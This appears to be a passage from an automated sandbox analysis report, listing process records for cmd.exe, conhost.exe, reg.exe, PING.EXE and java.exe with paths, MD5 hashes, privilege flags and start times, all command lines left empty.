Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc70000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 16 |
Start time: | 01:00:23 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 17 |
Start time: | 01:00:23 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc70000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 18 |
Start time: | 01:00:23 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 19 |
Start time: | 01:00:23 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\reg.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xb50000 |
File size: | 59'392 bytes |
MD5 hash: | CDD462E86EC0F20DE2A1D781928B1B0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 20 |
Start time: | 01:00:23 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\PING.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x900000 |
File size: | 18'944 bytes |
MD5 hash: | B3624DD758CCECF93A1226CEF252CA12 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 23 |
Start time: | 01:01:57 |
Start date: | 04/04/2025 |
Path: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 257'664 bytes |
MD5 hash: | 9DAA53BAB2ECB33DC0D9CA51552701FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 24 |
Start time: | 01:01:57 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 25 |
Start time: | 01:01:57 |
Start date: | 04/04/2025 |
Path: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 257'664 bytes |
MD5 hash: | 9DAA53BAB2ECB33DC0D9CA51552701FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Has exited: | true |
Target ID: | 26 |
Start time: | 01:01:57 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 27 |
Start time: | 01:01:58 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc70000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 28 |
Start time: | 01:01:58 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 29 |
Start time: | 01:01:58 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\PING.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x900000 |
File size: | 18'944 bytes |
MD5 hash: | B3624DD758CCECF93A1226CEF252CA12 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 30 |
Start time: | 01:01:58 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc70000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 31 |
Start time: | 01:01:58 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 32 |
Start time: | 01:01:58 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\PING.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x900000 |
File size: | 18'944 bytes |
MD5 hash: | B3624DD758CCECF93A1226CEF252CA12 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |